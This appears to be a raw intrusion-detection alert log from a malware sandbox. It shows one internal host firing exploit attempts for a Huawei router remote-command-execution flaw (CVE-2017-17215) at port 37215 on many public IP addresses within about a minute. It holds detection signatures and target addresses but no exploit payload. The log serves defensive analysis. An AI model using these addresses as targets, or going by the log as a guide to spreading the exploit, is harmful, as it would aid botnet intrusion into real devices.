                                                    07/10/24-08:26:36.339944TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4391437215192.168.2.1441.161.169.142
                                                    07/10/24-08:26:34.229279TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5751037215192.168.2.14157.117.249.235
                                                    07/10/24-08:26:41.508048TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4089637215192.168.2.1441.97.8.233
                                                    07/10/24-08:27:07.254962TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5290637215192.168.2.14157.127.40.106
                                                    07/10/24-08:26:52.029785TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3547037215192.168.2.14197.60.84.7
                                                    07/10/24-08:27:05.189458TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4235437215192.168.2.14197.138.243.134
                                                    07/10/24-08:27:22.487883TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5394437215192.168.2.1441.87.229.233
                                                    07/10/24-08:27:07.362026TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4269437215192.168.2.14155.226.124.133
                                                    07/10/24-08:27:27.058852TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5554037215192.168.2.14197.6.59.138
                                                    07/10/24-08:27:31.461924TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4199837215192.168.2.1441.89.218.142
                                                    07/10/24-08:26:25.432344TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4689837215192.168.2.14157.206.125.190
                                                    07/10/24-08:26:20.179402TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5731437215192.168.2.1481.227.235.41
                                                    07/10/24-08:26:11.562068TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4511837215192.168.2.14123.39.28.49
                                                    07/10/24-08:27:13.921324TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4511437215192.168.2.14157.195.136.112
                                                    07/10/24-08:26:31.061438TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5935437215192.168.2.1441.219.104.33
                                                    07/10/24-08:26:38.614472TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4882637215192.168.2.1441.72.192.239
                                                    07/10/24-08:27:02.756969TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4643437215192.168.2.1441.114.237.208
                                                    07/10/24-08:27:27.112829TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5024037215192.168.2.1441.19.170.40
                                                    07/10/24-08:26:15.852897TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5116437215192.168.2.14218.219.1.207
                                                    07/10/24-08:27:28.177023TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5954037215192.168.2.14157.66.35.62
                                                    07/10/24-08:26:43.788473TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5877837215192.168.2.14157.197.252.59
                                                    07/10/24-08:26:28.834166TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3708637215192.168.2.14157.69.138.150
                                                    07/10/24-08:27:24.973099TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5857237215192.168.2.14197.215.68.249
                                                    07/10/24-08:26:41.611140TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5514237215192.168.2.14197.68.107.132
                                                    07/10/24-08:27:08.352248TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5603237215192.168.2.14197.140.168.181
                                                    07/10/24-08:26:25.492137TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5287637215192.168.2.1441.197.25.242
                                                    07/10/24-08:27:03.011649TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5148037215192.168.2.14157.21.112.249
                                                    07/10/24-08:27:19.324879TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)6022437215192.168.2.1441.7.227.18
                                                    07/10/24-08:27:23.888639TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5050637215192.168.2.1451.211.147.123
                                                    07/10/24-08:26:45.619678TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5727237215192.168.2.1441.69.9.241
                                                    07/10/24-08:27:13.896003TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3295837215192.168.2.14157.60.247.93
                                                    07/10/24-08:27:08.402603TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3607437215192.168.2.14157.252.99.203
                                                    07/10/24-08:27:17.078951TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4054437215192.168.2.14157.151.168.56
                                                    07/10/24-08:26:18.030182TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4602837215192.168.2.14197.102.83.112
                                                    07/10/24-08:27:19.316090TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5425837215192.168.2.14197.225.126.147
                                                    07/10/24-08:27:08.415369TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3660437215192.168.2.1477.19.129.248
                                                    07/10/24-08:26:38.641903TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4748437215192.168.2.1441.192.0.19
                                                    07/10/24-08:26:53.172651TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5706437215192.168.2.1418.94.182.243
                                                    07/10/24-08:27:10.617343TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5487237215192.168.2.14197.165.125.206
                                                    07/10/24-08:26:18.023447TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5400037215192.168.2.14157.236.47.47
                                                    07/10/24-08:27:20.420210TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4874037215192.168.2.14175.86.61.143
                                                    07/10/24-08:27:05.092511TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3859837215192.168.2.14133.176.62.234
                                                    07/10/24-08:27:14.672861TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3466437215192.168.2.14197.95.162.158
                                                    07/10/24-08:27:10.675558TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4323437215192.168.2.14197.122.52.94
                                                    07/10/24-08:27:07.349676TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5642237215192.168.2.14121.6.100.119
                                                    07/10/24-08:27:14.665617TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3735037215192.168.2.14197.104.196.80
                                                    07/10/24-08:26:11.538305TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5142237215192.168.2.1441.170.150.68
                                                    07/10/24-08:26:43.698481TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3864637215192.168.2.14197.179.197.149
                                                    07/10/24-08:27:13.867298TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5126237215192.168.2.14157.210.237.235
                                                    07/10/24-08:26:29.881507TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4263237215192.168.2.1441.110.109.95
                                                    07/10/24-08:26:25.505910TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5689837215192.168.2.14157.161.115.217
                                                    07/10/24-08:27:05.158700TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4758037215192.168.2.1441.172.140.224
                                                    07/10/24-08:26:11.533087TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4375637215192.168.2.1498.174.205.229
                                                    07/10/24-08:27:10.635784TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3762837215192.168.2.14157.160.214.118
                                                    07/10/24-08:27:19.307932TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3789637215192.168.2.1441.24.149.155
                                                    07/10/24-08:26:45.633588TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4742037215192.168.2.14197.22.74.73
                                                    07/10/24-08:27:22.445688TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4222237215192.168.2.1441.86.204.217
                                                    07/10/24-08:27:31.561854TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4690037215192.168.2.14174.174.202.103
                                                    07/10/24-08:26:33.256885TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5970237215192.168.2.14197.228.158.216
                                                    07/10/24-08:26:38.624233TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3460437215192.168.2.14197.27.100.45
                                                    07/10/24-08:26:11.583025TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5396837215192.168.2.14171.13.124.34
                                                    07/10/24-08:26:17.942691TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3581637215192.168.2.14222.185.137.191
                                                    07/10/24-08:26:49.844919TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)6092637215192.168.2.14197.178.86.186
                                                    07/10/24-08:26:45.598078TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5760037215192.168.2.1441.63.143.9
                                                    07/10/24-08:26:31.081950TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5354037215192.168.2.1471.25.91.136
                                                    07/10/24-08:27:07.255298TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4243637215192.168.2.1441.170.146.214
                                                    07/10/24-08:26:25.463171TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5955237215192.168.2.1441.224.19.58
                                                    07/10/24-08:26:34.223622TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4068837215192.168.2.14197.51.68.8
                                                    07/10/24-08:26:55.456990TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3529637215192.168.2.1441.149.156.152
                                                    07/10/24-08:26:13.850694TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5185837215192.168.2.1441.128.69.103
                                                    07/10/24-08:26:38.567555TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4422837215192.168.2.14157.18.25.161
                                                    07/10/24-08:26:38.616347TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3373637215192.168.2.14157.229.45.118
                                                    07/10/24-08:26:14.770458TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3918437215192.168.2.1441.151.191.37
                                                    07/10/24-08:27:23.881648TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)6095637215192.168.2.14197.42.190.141
                                                    07/10/24-08:26:11.583025TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5564637215192.168.2.14170.185.174.63
                                                    07/10/24-08:26:55.470125TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4049437215192.168.2.1441.83.200.94
                                                    07/10/24-08:27:13.911358TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4610037215192.168.2.1441.65.236.250
                                                    07/10/24-08:27:02.731752TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4832037215192.168.2.149.59.162.89
                                                    07/10/24-08:27:13.971781TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3654037215192.168.2.1441.73.152.242
                                                    07/10/24-08:26:25.411489TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4112837215192.168.2.14157.160.129.211
                                                    07/10/24-08:26:25.490780TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4306437215192.168.2.14157.59.228.87
                                                    07/10/24-08:27:02.852572TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5842037215192.168.2.14157.216.235.12
                                                    07/10/24-08:27:24.871352TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4581237215192.168.2.14197.247.46.209
                                                    07/10/24-08:27:07.292595TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5753837215192.168.2.14157.113.66.67
                                                    07/10/24-08:27:24.965936TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5201237215192.168.2.1441.76.253.40
                                                    07/10/24-08:27:05.220771TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)6002837215192.168.2.14157.242.132.253
                                                    07/10/24-08:27:08.435352TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3676837215192.168.2.1441.248.243.90
                                                    07/10/24-08:26:17.950473TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5101037215192.168.2.14176.57.185.23
                                                    07/10/24-08:26:49.819552TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3556437215192.168.2.1441.13.110.67
                                                    07/10/24-08:26:49.748241TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3863837215192.168.2.14117.91.133.182
                                                    07/10/24-08:27:02.985510TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5906837215192.168.2.1441.116.89.189
                                                    07/10/24-08:27:19.352052TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5771037215192.168.2.14197.40.144.73
                                                    07/10/24-08:26:22.284234TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5557437215192.168.2.14157.252.76.73
                                                    07/10/24-08:27:32.489604TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4906837215192.168.2.14113.24.217.218
                                                    07/10/24-08:26:11.480134TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3321237215192.168.2.1441.236.232.103
                                                    07/10/24-08:27:33.956245TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5286637215192.168.2.1441.129.176.40
                                                    07/10/24-08:27:28.042131TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5108037215192.168.2.14157.123.86.9
                                                    07/10/24-08:27:22.794160TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3816237215192.168.2.1423.205.191.39
                                                    07/10/24-08:26:11.122973TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5224837215192.168.2.1441.80.154.10
                                                    07/10/24-08:26:31.098508TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4985637215192.168.2.14197.112.37.53
                                                    07/10/24-08:26:43.607269TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4439837215192.168.2.14211.114.28.252
                                                    07/10/24-08:27:11.547773TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)6017037215192.168.2.1441.22.227.124
                                                    07/10/24-08:26:52.022282TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5863037215192.168.2.14197.150.95.41
                                                    07/10/24-08:27:05.172720TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4746237215192.168.2.14129.243.244.205
                                                    07/10/24-08:27:08.412825TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5371437215192.168.2.14148.204.228.124
                                                    07/10/24-08:27:33.852238TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3403037215192.168.2.14197.237.18.124
                                                    07/10/24-08:27:13.879424TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4409237215192.168.2.14157.34.12.97
                                                    07/10/24-08:27:31.559678TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3510837215192.168.2.14186.84.147.1
                                                    07/10/24-08:27:33.939106TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5705837215192.168.2.1471.0.114.170
                                                    07/10/24-08:26:42.438792TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5287037215192.168.2.14197.160.44.124
                                                    07/10/24-08:26:51.973462TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4309237215192.168.2.1441.110.44.60
                                                    07/10/24-08:26:41.419357TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4971637215192.168.2.14197.167.44.70
                                                    07/10/24-08:26:59.848690TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3491837215192.168.2.1441.24.191.93
                                                    07/10/24-08:26:28.899936TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4716237215192.168.2.1446.122.8.79
                                                    07/10/24-08:27:27.136540TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5707837215192.168.2.14197.230.152.241
                                                    07/10/24-08:27:05.089807TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3288637215192.168.2.1441.220.32.84
                                                    07/10/24-08:27:07.343268TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4574437215192.168.2.1419.188.39.111
                                                    07/10/24-08:27:14.893689TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4431637215192.168.2.14188.194.118.153
                                                    07/10/24-08:27:13.728066TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4205837215192.168.2.1441.166.134.161
                                                    07/10/24-08:26:38.536872TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5420037215192.168.2.1441.240.161.85
                                                    07/10/24-08:27:02.868387TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5148637215192.168.2.1441.57.230.87
                                                    07/10/24-08:27:19.320404TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4925837215192.168.2.14197.227.4.76
                                                    07/10/24-08:27:22.492179TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4909437215192.168.2.1441.145.131.58
                                                    07/10/24-08:26:34.252438TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4773437215192.168.2.14197.164.235.226
                                                    07/10/24-08:26:25.456232TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5273437215192.168.2.14157.144.200.180
                                                    07/10/24-08:27:05.083830TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5738837215192.168.2.14157.56.135.162
                                                    07/10/24-08:26:18.000984TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4999637215192.168.2.14194.75.180.102
                                                    07/10/24-08:26:51.991411TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5051037215192.168.2.14157.6.20.166
                                                    07/10/24-08:27:20.474239TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3704237215192.168.2.14157.58.40.26
                                                    07/10/24-08:26:48.018095TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5136837215192.168.2.14133.94.66.167
                                                    07/10/24-08:27:22.498081TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4993837215192.168.2.14197.67.210.136
                                                    07/10/24-08:27:22.839204TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5338637215192.168.2.14197.49.177.2
                                                    07/10/24-08:26:59.534409TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3679837215192.168.2.14157.92.248.108
                                                    07/10/24-08:27:30.553944TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4428037215192.168.2.14197.238.166.51
                                                    07/10/24-08:27:11.529437TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4475637215192.168.2.1446.235.164.76
                                                    07/10/24-08:27:10.629706TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3410437215192.168.2.1441.78.86.3
                                                    07/10/24-08:27:24.956941TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3958037215192.168.2.1441.169.76.150
                                                    07/10/24-08:26:13.655669TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5106037215192.168.2.1441.56.53.244
                                                    07/10/24-08:26:49.782685TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5943437215192.168.2.14197.113.128.254
                                                    07/10/24-08:26:59.761557TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)6013237215192.168.2.1483.237.204.77
                                                    07/10/24-08:26:17.986664TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3627837215192.168.2.14197.71.194.17
                                                    07/10/24-08:26:38.605910TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5378837215192.168.2.14124.103.66.32
                                                    07/10/24-08:27:08.379030TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3312637215192.168.2.1441.77.224.152
                                                    07/10/24-08:26:51.957475TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4432437215192.168.2.14157.14.248.212
                                                    07/10/24-08:27:27.155945TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3827637215192.168.2.1441.87.42.237
                                                    07/10/24-08:26:17.977677TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4866237215192.168.2.1442.44.33.102
                                                    07/10/24-08:26:11.659396TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3516837215192.168.2.14197.108.193.202
                                                    07/10/24-08:26:28.651021TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3845037215192.168.2.14197.73.184.148
                                                    07/10/24-08:26:25.488063TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3774637215192.168.2.14197.62.96.68
                                                    07/10/24-08:26:11.575956TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5391237215192.168.2.14221.169.253.33
                                                    07/10/24-08:27:24.944051TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3950237215192.168.2.14157.246.86.3
                                                    07/10/24-08:26:36.357505TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3622237215192.168.2.14197.42.134.206
                                                    07/10/24-08:27:24.957397TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5345037215192.168.2.14197.171.209.1
                                                    07/10/24-08:26:52.043481TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4473837215192.168.2.1441.178.185.144
                                                    07/10/24-08:27:22.835988TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5020437215192.168.2.14197.113.10.240
                                                    07/10/24-08:26:14.759956TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5317637215192.168.2.14157.151.198.212
                                                    07/10/24-08:26:34.234133TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)6054637215192.168.2.1441.69.85.164
                                                    07/10/24-08:26:29.864679TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5675637215192.168.2.14197.110.84.193
                                                    07/10/24-08:27:11.526657TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4627437215192.168.2.14157.132.233.162
                                                    07/10/24-08:27:23.792966TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5747837215192.168.2.1441.64.77.14
                                                    07/10/24-08:26:36.340755TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3987837215192.168.2.1441.11.72.169
                                                    07/10/24-08:26:55.433645TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4240437215192.168.2.1496.218.159.227
                                                    07/10/24-08:27:17.027342TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3771237215192.168.2.14197.211.47.72
                                                    07/10/24-08:27:14.841554TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4581437215192.168.2.1441.168.93.134
                                                    07/10/24-08:26:38.630697TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5833237215192.168.2.14157.250.70.160
                                                    07/10/24-08:27:19.329520TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4202637215192.168.2.14195.182.144.206
                                                    07/10/24-08:27:02.791208TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4482837215192.168.2.1441.90.241.84
                                                    07/10/24-08:27:10.621432TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4411637215192.168.2.14198.199.209.28
                                                    07/10/24-08:26:23.301289TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4121437215192.168.2.14194.56.58.218
                                                    07/10/24-08:26:59.657452TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4898437215192.168.2.14197.77.119.55
                                                    07/10/24-08:27:13.835787TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5432037215192.168.2.14153.34.35.48
                                                    07/10/24-08:26:13.645401TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5893237215192.168.2.1441.98.208.163
                                                    07/10/24-08:26:49.810564TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3812637215192.168.2.14108.170.53.50
                                                    07/10/24-08:26:18.002573TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4010637215192.168.2.1441.220.66.4
                                                    07/10/24-08:26:41.281691TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3760437215192.168.2.14197.149.222.180
                                                    07/10/24-08:27:13.844638TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3620437215192.168.2.14197.79.161.178
                                                    07/10/24-08:27:19.310964TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5437437215192.168.2.14197.100.188.220
                                                    07/10/24-08:26:23.293850TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5079237215192.168.2.1441.79.125.13
                                                    07/10/24-08:26:47.877444TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5601037215192.168.2.1441.50.145.121
                                                    07/10/24-08:26:59.634002TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4203237215192.168.2.14197.175.174.137
                                                    07/10/24-08:27:27.083011TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4443837215192.168.2.14197.77.136.170
                                                    07/10/24-08:26:55.422877TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3376237215192.168.2.1441.224.17.68
                                                    07/10/24-08:27:20.396105TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4920037215192.168.2.1420.191.177.89
                                                    07/10/24-08:26:11.129630TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4249037215192.168.2.14157.203.62.242
                                                    07/10/24-08:26:38.559364TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5541837215192.168.2.14157.167.179.1
                                                    07/10/24-08:26:26.557067TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3497637215192.168.2.14197.13.96.57
